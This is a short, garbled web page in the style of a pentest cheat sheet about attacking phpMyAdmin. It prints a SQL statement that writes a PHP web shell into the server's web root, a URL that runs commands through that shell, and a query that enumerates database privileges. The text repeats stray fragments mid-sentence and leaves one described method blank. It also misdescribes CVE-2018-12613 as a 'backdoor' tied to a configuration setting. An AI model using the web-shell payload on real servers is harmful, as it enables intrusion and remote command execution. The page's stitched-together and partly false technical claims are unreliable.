Phpmyadmin Hacktricks May 2026

For pentesters: always check for phpMyAdmin early. For defenders: assume it will be discovered, and harden accordingly.

Introduction phpMyAdmin is the most popular database management tool on the planet. Written in PHP, it provides a web-based interface to manage MySQL and MariaDB servers. While it is a godsend for developers, it is a prime target for attackers. If an adversary gains access to phpMyAdmin, the game is over — they can dump credentials, escalate privileges, and even gain remote code execution (RCE) on the host server. phpmyadmin hacktricks

SELECT '<?php system($_GET["c"]); ?>' INTO OUTFILE "/var/www/html/shell.php"; Then call it: http://target.com/shell.php?c=id If secure_file_priv is set (prevents INTO OUTFILE ), use the general log method: For pentesters: always check for phpMyAdmin early

SELECT grantee, privilege_type FROM information_schema.user_privileges; If you have SUPER , you can change server variables, kill queries, and potentially compromise the entire DB server. CVE-2018-12613 (Authenticated RCE) In phpMyAdmin 4.8.0–4.8.1, a backdoor allows remote code execution via the $cfg['AllowArbitraryServer'] setting. Written in PHP, it provides a web-based interface